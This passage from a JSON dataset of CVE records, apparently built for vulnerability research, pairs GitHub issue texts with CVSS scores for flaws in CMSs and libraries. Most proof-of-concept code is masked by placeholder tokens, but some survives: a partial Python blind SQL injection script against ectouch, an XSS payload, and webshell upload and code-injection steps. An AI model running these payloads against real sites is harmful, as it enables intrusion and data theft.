  54127. "description": "segment fault in apply_sao_internal when decoding file. segment fault in apply_sao_internal when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54129. "severity": "MEDIUM",
  54130. "baseScore": 6.5,
  54131. "impactScore": 3.6,
  54132. "exploitabilityScore": 2.8
  54133. },
  54134. {
  54135. "CVE_ID": "CVE-2020-21606",
  54136. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/232",
  54137. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/232",
  54138. "Repo_new": "strukturag/libde265",
  54139. "Issue_Created_At": "2019-12-24T08:22:59Z",
  54140. "description": "heap buffer overflow in put_epel NUMBERTAG fallback when decoding file. heap buffer overflow in put_epel NUMBERTAG fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54141. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54142. "severity": "MEDIUM",
  54143. "baseScore": 6.5,
  54144. "impactScore": 3.6,
  54145. "exploitabilityScore": 2.8
  54146. },
  54147. {
  54148. "CVE_ID": "CVE-2020-21648",
  54149. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/9",
  54150. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/9",
  54151. "Repo_new": "shadoweb/wdja",
  54152. "Issue_Created_At": "2019-12-26T15:55:23Z",
  54153. "description": "file deletion vulnerability. Vulnerability file PATHTAG FILETAG parameter file accept without filtered,attacker can delete any files with changed the file's value\u3002 PATHTAG FILETAG",
  54154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  54155. "severity": "CRITICAL",
  54156. "baseScore": 9.1,
  54157. "impactScore": 5.2,
  54158. "exploitabilityScore": 3.9
  54159. },
  54160. {
  54161. "CVE_ID": "CVE-2020-21649",
  54162. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/4",
  54163. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/4",
  54164. "Repo_new": "lolipop1234/xxd",
  54165. "Issue_Created_At": "2019-12-27T02:50:43Z",
  54166. "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
  54167. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  54168. "severity": "HIGH",
  54169. "baseScore": 8.1,
  54170. "impactScore": 5.2,
  54171. "exploitabilityScore": 2.8
  54172. },
  54173. {
  54174. "CVE_ID": "CVE-2020-21650",
  54175. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/6",
  54176. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/6",
  54177. "Repo_new": "lolipop1234/xxd",
  54178. "Issue_Created_At": "2019-12-27T02:56:43Z",
  54179. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
  54180. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54181. "severity": "HIGH",
  54182. "baseScore": 8.8,
  54183. "impactScore": 5.9,
  54184. "exploitabilityScore": 2.8
  54185. },
  54186. {
  54187. "CVE_ID": "CVE-2020-21651",
  54188. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/3",
  54189. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/3",
  54190. "Repo_new": "lolipop1234/xxd",
  54191. "Issue_Created_At": "2019-12-27T02:42:28Z",
  54192. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method. Vulnerability location code PATHTAG FILETAG",
  54193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54194. "severity": "CRITICAL",
  54195. "baseScore": 9.8,
  54196. "impactScore": 5.9,
  54197. "exploitabilityScore": 3.9
  54198. },
  54199. {
  54200. "CVE_ID": "CVE-2020-21652",
  54201. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/7",
  54202. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/7",
  54203. "Repo_new": "lolipop1234/xxd",
  54204. "Issue_Created_At": "2019-12-27T02:57:04Z",
  54205. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
  54206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54207. "severity": "CRITICAL",
  54208. "baseScore": 9.8,
  54209. "impactScore": 5.9,
  54210. "exploitabilityScore": 3.9
  54211. },
  54212. {
  54213. "CVE_ID": "CVE-2020-21653",
  54214. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/5",
  54215. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/5",
  54216. "Repo_new": "lolipop1234/xxd",
  54217. "Issue_Created_At": "2019-12-27T02:51:36Z",
  54218. "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
  54219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  54220. "severity": "CRITICAL",
  54221. "baseScore": 9.1,
  54222. "impactScore": 5.2,
  54223. "exploitabilityScore": 3.9
  54224. },
  54225. {
  54226. "CVE_ID": "CVE-2020-21654",
  54227. "Issue_Url_old": "https://github.com/emlog/emlog/issues/55",
  54228. "Issue_Url_new": "https://github.com/emlog/emlog/issues/55",
  54229. "Repo_new": "emlog/emlog",
  54230. "Issue_Created_At": "2019-12-30T07:23:54Z",
  54231. "description": "emlog NUMBERTAG zip template getshell vulnerability. different as plugin,in the same function but not same includer. vul founded in FILETAG line NUMBERTAG upload a zip file with webshell in this page. FILETAG Limit in PATHTAG line NUMBERTAG FILETAG we need create a dir named FILETAG and touch a webshell named FILETAG too. like this\uff1a FILETAG upload and gotshell: PATHTAG (); FILETAG",
  54232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54233. "severity": "HIGH",
  54234. "baseScore": 7.2,
  54235. "impactScore": 5.9,
  54236. "exploitabilityScore": 1.2
  54237. },
  54238. {
  54239. "CVE_ID": "CVE-2020-21656",
  54240. "Issue_Url_old": "https://github.com/gosea/xyhcms3/issues/2",
  54241. "Issue_Url_new": "https://github.com/gosea/xyhcms3/issues/2",
  54242. "Repo_new": "gosea/xyhcms3",
  54243. "Issue_Created_At": "2019-12-31T08:29:04Z",
  54244. "description": "There is a stored xss in PATHTAG FILETAG FILETAG FILETAG",
  54245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54246. "severity": "MEDIUM",
  54247. "baseScore": 5.4,
  54248. "impactScore": 2.7,
  54249. "exploitabilityScore": 2.3
  54250. },
  54251. {
  54252. "CVE_ID": "CVE-2020-21658",
  54253. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/10",
  54254. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/10",
  54255. "Repo_new": "shadoweb/wdja",
  54256. "Issue_Created_At": "2020-01-01T16:43:03Z",
  54257. "description": "wdja has csrf vulnerability. wdja has csrf APITAG csrf vulnerability is often used in combination with phishing APITAG use csrfpoc Establish a phishing website. If the victim visits the phishing website page while logging in to his website, the csrf vulnerability will be exploited. poc\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Authentication method\uff1a Login APITAG on csrfpoc\uff0cthen new Webmaster will be added. FILETAG FILETAG FILETAG wdja APITAG",
  54258. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  54259. "severity": "MEDIUM",
  54260. "baseScore": 6.5,
  54261. "impactScore": 3.6,
  54262. "exploitabilityScore": 2.8
  54263. },
  54264. {
  54265. "CVE_ID": "CVE-2020-21667",
  54266. "Issue_Url_old": "https://github.com/che-my/fastadmin-tp6/issues/2",
  54267. "Issue_Url_new": "https://github.com/che-my/fastadmin-tp6/issues/2",
  54268. "Repo_new": "che-my/fastadmin-tp6",
  54269. "Issue_Created_At": "2019-12-30T02:57:21Z",
  54270. "description": "Fastadmin tp6 SQL injection. When a user with administrator rights has logged in the background, SQL injection can be performed during sorting by constructing malicious data. In file APITAG line NUMBERTAG the 'table' parameter passed in here is not filtered,so we can pass a malicious parameter for SQL injection. POC: CODETAG Example: FILETAG",
  54271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54272. "severity": "HIGH",
  54273. "baseScore": 7.2,
  54274. "impactScore": 5.9,
  54275. "exploitabilityScore": 1.2
  54276. },
  54277. {
  54278. "CVE_ID": "CVE-2020-21674",
  54279. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1298",
  54280. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1298",
  54281. "Repo_new": "libarchive/libarchive",
  54282. "Issue_Created_At": "2019-12-28T18:16:57Z",
  54283. "description": "Heap buffer overflow in APITAG (archive_string.c). bsdtar: An error in APITAG (archive_string.c) triggers an out of bounds write in heap memory that results into a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: versions of libarchive NUMBERTAG dev How you obtained it: built from source libarchive NUMBERTAG dev ( URLTAG Tested OS: Linu NUMBERTAG generic NUMBERTAG Tested compiler version : gcc version NUMBERTAG What other files were involved? To trigger the bug, use the the crash file (unzip crash APITAG FILETAG =============== Compile with address address sanitizer ( fsanitize=addrsan) Command to reproduce the bug: $ ./bsdtar t f crash file Output (partial): ERRORTAG Crash analysis : In APITAG (archive_string.c), upon execution of the crashing input (crash file): CODETAG",
  54284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54285. "severity": "MEDIUM",
  54286. "baseScore": 6.5,
  54287. "impactScore": 3.6,
  54288. "exploitabilityScore": 2.8
  54289. },
  54290. {
  54291. "CVE_ID": "CVE-2020-21677",
  54292. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/123",
  54293. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/123",
  54294. "Repo_new": "saitoha/libsixel",
  54295. "Issue_Created_At": "2019-12-24T03:33:01Z",
  54296. "description": "heap buffer overflow in APITAG at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in APITAG at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  54297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54298. "severity": "MEDIUM",
  54299. "baseScore": 6.5,
  54300. "impactScore": 3.6,
  54301. "exploitabilityScore": 2.8
  54302. },
  54303. {
  54304. "CVE_ID": "CVE-2020-21725",
  54305. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/1",
  54306. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/1",
  54307. "Repo_new": "cocococococoli/cve",
  54308. "Issue_Created_At": "2019-12-31T02:30:25Z",
  54309. "description": "APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability pid parameter. APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability pid parameter A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about pid parameter this CMS offical website > FILETAG FILETAG vul url > FILETAG poc ERRORTAG FILETAG FILETAG Vulnerability file PATHTAG FILETAG FILETAG FILETAG from APITAG APITAG Tech)",
  54310. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54311. "severity": "CRITICAL",
  54312. "baseScore": 9.8,
  54313. "impactScore": 5.9,
  54314. "exploitabilityScore": 3.9
  54315. },
  54316. {
  54317. "CVE_ID": "CVE-2020-21726",
  54318. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/2",
  54319. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/2",
  54320. "Repo_new": "cocococococoli/cve",
  54321. "Issue_Created_At": "2019-12-31T02:34:51Z",
  54322. "description": "A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about cid parameter. APITAG NUMBERTAG have unauthorized sleep blind injection SQL vulnerability cid parameter A unauthorized sleep blind injection SQL vulnerability was discovered in APITAG CMS NUMBERTAG about cid parameter this CMS offical website > FILETAG FILETAG vuln url > FILETAG poc ERRORTAG FILETAG FILETAG vuln file > PATHTAG FILETAG PATHTAG FILETAG FILETAG from APITAG APITAG Tech)",
  54323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54324. "severity": "CRITICAL",
  54325. "baseScore": 9.8,
  54326. "impactScore": 5.9,
  54327. "exploitabilityScore": 3.9
  54328. },
  54329. {
  54330. "CVE_ID": "CVE-2020-21729",
  54331. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/3",
  54332. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/3",
  54333. "Repo_new": "cocococococoli/cve",
  54334. "Issue_Created_At": "2020-01-03T10:30:26Z",
  54335. "description": "JEECMS NUMBERTAG have Stored XSS vulnerability. this is cms offical website > FILETAG A stored xss vulnerability was discovered in JEECMS NUMBERTAG FILETAG poc payload is APITAG FILETAG after submit ,refresh this page Trigger XSS Vulnerability FILETAG APITAG FILETAG FILETAG Vulnerability file PATHTAG CODETAG PATHTAG FILETAG PATHTAG FILETAG",
  54336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54337. "severity": "MEDIUM",
  54338. "baseScore": 5.4,
  54339. "impactScore": 2.7,
  54340. "exploitabilityScore": 2.3
  54341. },
  54342. {
  54343. "CVE_ID": "CVE-2020-21784",
  54344. "Issue_Url_old": "https://github.com/slackero/phpwcms/issues/286",
  54345. "Issue_Url_new": "https://github.com/slackero/phpwcms/issues/286",
  54346. "Repo_new": "slackero/phpwcms",
  54347. "Issue_Created_At": "2020-01-16T07:16:02Z",
  54348. "description": "Code Injection Vulnerability can Getshell. Code audit FILETAG code Open the secure boot file APITAG file path is APITAG APITAG it include APITAG in line NUMBERTAG FILETAG FILETAG code open file APITAG and you can see line NUMBERTAG FILETAG FILETAG code tarck the function APITAG in APITAG in line NUMBERTAG FILETAG and in line NUMBERTAG it will call function APITAG to write the config file in line NUMBERTAG FILETAG FILETAG Testing getshell in this interface,you can input some infomation like this. FILETAG payload APITAG After completing it, click Submit.It will show some error information,but you can access like this address and you can see it run the injection code. FILETAG Solution Filtering some sensitive characters.",
  54349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54350. "severity": "CRITICAL",
  54351. "baseScore": 9.8,
  54352. "impactScore": 5.9,
  54353. "exploitabilityScore": 3.9
  54354. },
  54355. {
  54356. "CVE_ID": "CVE-2020-21806",
  54357. "Issue_Url_old": "https://github.com/ectouch/ectouch/issues/5",
  54358. "Issue_Url_new": "https://github.com/ectouch/ectouch/issues/5",
  54359. "Repo_new": "ectouch/ectouch",
  54360. "Issue_Created_At": "2020-01-04T06:27:04Z",
  54361. "description": "SQL Injection vulnerability. Order\uff1a EMAILTAG .cn poc: import requests import re,string import APITAG def APITAG param={} url=\" URLTAG \" payload_len NUMBERTAG or APITAG a\"' APITAG i NUMBERTAG while i NUMBERTAG payload_len_i = APITAG APITAG goods_i = APITAG param['goods'] = goods_i print(param) r = APITAG if \"cart_number\" in r.text: print(\"len:\",i) return i i NUMBERTAG def get_database(len): param={} database_name=\"\" url=\" URLTAG \" payload_database NUMBERTAG or APITAG a\"' APITAG chr_str = APITAG + APITAG + APITAG for i in range(len): for j in chr_str: APITAG APITAG goods_i = APITAG param['goods'] = goods_i r = APITAG if \"cart_number\" in r.text: database_name+=j APITAG APITAG get_database(len)",
  54362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54363. "severity": "CRITICAL",
  54364. "baseScore": 9.8,
  54365. "impactScore": 5.9,
  54366. "exploitabilityScore": 3.9
  54367. },
  54368. {
  54369. "CVE_ID": "CVE-2020-21813",
  54370. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/182",
  54371. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/182",
  54372. "Repo_new": "libredwg/libredwg",
  54373. "Issue_Created_At": "2020-01-10T06:17:10Z",
  54374. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG APITAG NUMBERTAG NULL pointer dereference in htmlescape PATHTAG POC: URLTAG ASAN says: ERRORTAG",
  54375. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54376. "severity": "HIGH",
  54377. "baseScore": 7.8,
  54378. "impactScore": 5.9,
  54379. "exploitabilityScore": 1.8
  54380. },
  54381. {
  54382. "CVE_ID": "CVE-2020-21827",
  54383. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/183",
  54384. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/183",
  54385. "Repo_new": "libredwg/libredwg",
  54386. "Issue_Created_At": "2020-01-13T02:49:42Z",
  54387. "description": "Heap over flow. I found a bug in dwg2dxf. POC: URLTAG ERRORTAG",
  54388. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54389. "severity": "HIGH",
  54390. "baseScore": 7.8,
  54391. "impactScore": 5.9,
  54392. "exploitabilityScore": 1.8
  54393. },
  54394. {
  54395. "CVE_ID": "CVE-2020-21830",
  54396. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/188",
  54397. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/188",
  54398. "Repo_new": "libredwg/libredwg",
  54399. "Issue_Created_At": "2020-01-15T04:37:59Z",
  54400. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp APITAG NUMBERTAG NULL pointer dereference in read NUMBERTAG compressed_section PATHTAG POC: URLTAG ERRORTAG",
  54401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54402. "severity": "HIGH",
  54403. "baseScore": 8.8,
  54404. "impactScore": 5.9,
  54405. "exploitabilityScore": 2.8
  54406. },
  54407. {
  54408. "CVE_ID": "CVE-2020-21854",
  54409. "Issue_Url_old": "https://github.com/TideSec/WDScanner/issues/41",
  54410. "Issue_Url_new": "https://github.com/tidesec/wdscanner/issues/41",
  54411. "Repo_new": "tidesec/wdscanner",
  54412. "Issue_Created_At": "2020-01-08T06:10:40Z",
  54413. "description": "XSS vulnerability in system management page. Hello, I found XSS vulnerability in the system management page\u3002 APITAG This is the payload When I tested: FILETAG Param:c=new&m=set APITAG APITAG group NUMBERTAG mail= APITAG APITAG NUMBERTAG APITAG APITAG",
  54414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54415. "severity": "MEDIUM",
  54416. "baseScore": 6.1,
  54417. "impactScore": 2.7,
  54418. "exploitabilityScore": 2.8
  54419. },
  54420. {
  54421. "CVE_ID": "CVE-2020-21929",
  54422. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/8",
  54423. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/8",
  54424. "Repo_new": "weng-xianhu/eyoucms",
  54425. "Issue_Created_At": "2020-01-14T08:25:16Z",
  54426. "description": "Storage XSS vulnerabilities exist in \"web_copyright \" field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_copyright FILETAG FILETAG",
  54427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54428. "severity": "MEDIUM",
  54429. "baseScore": 5.4,
  54430. "impactScore": 2.7,
  54431. "exploitabilityScore": 2.3
  54432. },
  54433. {
  54434. "CVE_ID": "CVE-2020-21930",
  54435. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/9",
  54436. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/9",
  54437. "Repo_new": "weng-xianhu/eyoucms",
  54438. "Issue_Created_At": "2020-01-14T08:33:10Z",
  54439. "description": "Storage XSS vulnerabilities exist in \"web_attr NUMBERTAG field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_attr NUMBERTAG FILETAG FILETAG",
  54440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54441. "severity": "MEDIUM",
  54442. "baseScore": 5.4,
  54443. "impactScore": 2.7,
  54444. "exploitabilityScore": 2.3
  54445. },
  54446. {
  54447. "CVE_ID": "CVE-2020-21967",
  54448. "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/20306",
  54449. "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/20306",
  54450. "Repo_new": "prestashop/prestashop",
  54451. "Issue_Created_At": "2020-07-23T17:29:20Z",
  54452. "description": "Cross Site Scripting Issue in APITAG Using File Upload Functionality. APITAG An issue is discovered in APITAG version NUMBERTAG under the Catelog feature when using the file upload functionality for uploading the Files for various products. This issue exists because it fails to implement file content checks and improperly handles the output, resulting in cross site scripting attack that leads to cookie stealing or malicious actions. Steps to Reproduce NUMBERTAG Go to Catelog feature NUMBERTAG Click on File component and add the details accordingly NUMBERTAG Create a file with .html extension and enter the payload APITAG alert('XSS!!'); APITAG within it. APITAG its, APITAG NUMBERTAG Upload the file NUMBERTAG Login as customer and click on the file uploaded for the particular product NUMBERTAG You can see the XSS payload gets executed. CVSS Score: PATHTAG FILETAG FILETAG FILETAG",
  54453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  54454. "severity": "MEDIUM",
  54455. "baseScore": 4.8,
  54456. "impactScore": 2.7,
  54457. "exploitabilityScore": 1.7
  54458. },
  54459. {
  54460. "CVE_ID": "CVE-2020-22083",
  54461. "Issue_Url_old": "https://github.com/jsonpickle/jsonpickle/issues/332",
  54462. "Issue_Url_new": "https://github.com/jsonpickle/jsonpickle/issues/332",
  54463. "Repo_new": "jsonpickle/jsonpickle",
  54464. "Issue_Created_At": "2020-12-17T14:50:46Z",
  54465. "description": "Jsonpickle APITAG function unsafely form objects that can lead to Remote code execution. APITAG NUMBERTAG allows remote code execution during deserialization of a malicious payload through the APITAG function. Attack Vectors : The jsonpickle can be exploited by deserialization of malicious jsonpickled payload with default APITAG function of its object. The payload can be easily generated by this payload generator: URLTAG and passed to decode function like object = APITAG it will certainly execute command.",
  54466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54467. "severity": "CRITICAL",
  54468. "baseScore": 9.8,
  54469. "impactScore": 5.9,
  54470. "exploitabilityScore": 3.9
  54471. },
  54472. {
  54473. "CVE_ID": "CVE-2020-22120",
  54474. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/3",
  54475. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/3",
  54476. "Repo_new": "peacexie/imcat",
  54477. "Issue_Created_At": "2020-02-10T04:28:16Z",
  54478. "description": "You code has a Code Execution Vulnerability in the backstage . APITAG the backstage FILETAG NUMBERTAG find \u201cDIY\u914d\u7f6e\u201d URLTAG NUMBERTAG Click on the \u201c\u4fee\u6539\u201d FILETAG NUMBERTAG Modify the content payload\uff1a APITAG And save it FILETAG NUMBERTAG Access to this file and it has a Code Execution FILETAG fix: APITAG best removal of this function",
  54479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54480. "severity": "HIGH",
  54481. "baseScore": 8.8,
  54482. "impactScore": 5.9,
  54483. "exploitabilityScore": 2.8
  54484. },
  54485. {
  54486. "CVE_ID": "CVE-2020-22124",
  54487. "Issue_Url_old": "https://github.com/876054426/vul/issues/1",
  54488. "Issue_Url_new": "https://github.com/876054426/vul/issues/1",
  54489. "Repo_new": "876054426/vul",
  54490. "Issue_Created_At": "2020-02-25T07:56:40Z",
  54491. "description": "joyplus cms NUMBERTAG has Any file to read vulnerability. Title: joyplus cms NUMBERTAG Any file to read vulnerability Date NUMBERTAG Exploit Author: Zeo Vendor Homepage: URLTAG and FILETAG Software Link: URLTAG Version NUMBERTAG Tested on Windows NUMBERTAG joyplus cms NUMBERTAG has a vulnerability that can Any file to read that would allow an attacker to Sensitive information website and mysql or ftp password Proof NUMBERTAG Normal installation site and login URLTAG NUMBERTAG Access to trigger the vulnerability site You can switch to any directory payload FILETAG You can switch to any directory PATHTAG FILETAG NUMBERTAG read the PATHTAG code Let the cat out of the mysql password You can switch to any directory\uff0cjust change the PATHTAG FILETAG",
  54492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  54493. "severity": "HIGH",
  54494. "baseScore": 7.5,
  54495. "impactScore": 3.6,
  54496. "exploitabilityScore": 3.9
  54497. },
  54498. {
  54499. "CVE_ID": "CVE-2020-22148",
  54500. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1157",
  54501. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1157",
  54502. "Repo_new": "piwigo/piwigo",
  54503. "Issue_Created_At": "2020-02-12T02:40:57Z",
  54504. "description": "Stored Cross Site Scripting in APITAG Hi team, I just found a stored XSS in APITAG . Exploit Request : CODETAG APITAG APITAG FILETAG",
  54505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54506. "severity": "MEDIUM",
  54507. "baseScore": 6.1,
  54508. "impactScore": 2.7,
  54509. "exploitabilityScore": 2.8
  54510. },
  54511. {
  54512. "CVE_ID": "CVE-2020-22150",
  54513. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1158",
  54514. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1158",
  54515. "Repo_new": "piwigo/piwigo",
  54516. "Issue_Created_At": "2020-02-12T03:32:27Z",
  54517. "description": "XSS in APITAG Hi team! I found a XSS in XSS in APITAG Exploit Request: CODETAG APITAG FILETAG",
  54518. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54519. "severity": "MEDIUM",
  54520. "baseScore": 6.1,
  54521. "impactScore": 2.7,
  54522. "exploitabilityScore": 2.8
  54523. },
  54524. {
  54525. "CVE_ID": "CVE-2020-22198",
  54526. "Issue_Url_old": "https://github.com/blindkey/DedeCMSv5/issues/1",
  54527. "Issue_Url_new": "https://github.com/blindkey/dedecmsv5/issues/1",
  54528. "Repo_new": "blindkey/dedecmsv5",
  54529. "Issue_Created_At": "2020-02-17T09:01:25Z",
  54530. "description": "ajax_membergroup.php mdescription SQL inject. FILETAG FILETAG line NUMBERTAG indicate that we can control mdescription variables . because there is no fillter fro var mdescription. so we can acheive a sql injection in that . like poc: GET PATHTAG description NUMBERTAG D@ APITAG , description APITAG APITAG APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG SLCC2; .NET CLR NUMBERTAG NET CLR NUMBERTAG NET CLR NUMBERTAG NET NUMBERTAG C; .NET NUMBERTAG E; r NUMBERTAG like APITAG Type NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a",
  54531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54532. "severity": "CRITICAL",
  54533. "baseScore": 9.8,
  54534. "impactScore": 5.9,
  54535. "exploitabilityScore": 3.9
  54536. },
  54537. {
  54538. "CVE_ID": "CVE-2020-22199",
  54539. "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/1",
  54540. "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/1",
  54541. "Repo_new": "blindkey/cve_like",
  54542. "Issue_Created_At": "2020-02-17T11:17:50Z",
  54543. "description": "phpcms NUMBERTAG sp6 FILETAG SQL inject. today , i collect some traffic from internet and i found something like this. CODETAG so many scanner try to do some thiing . so i do some reserach .. FILETAG it's APITAG is no filter in FILETAG . the digg_mod trans to mod_id and get excute.",
  54544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
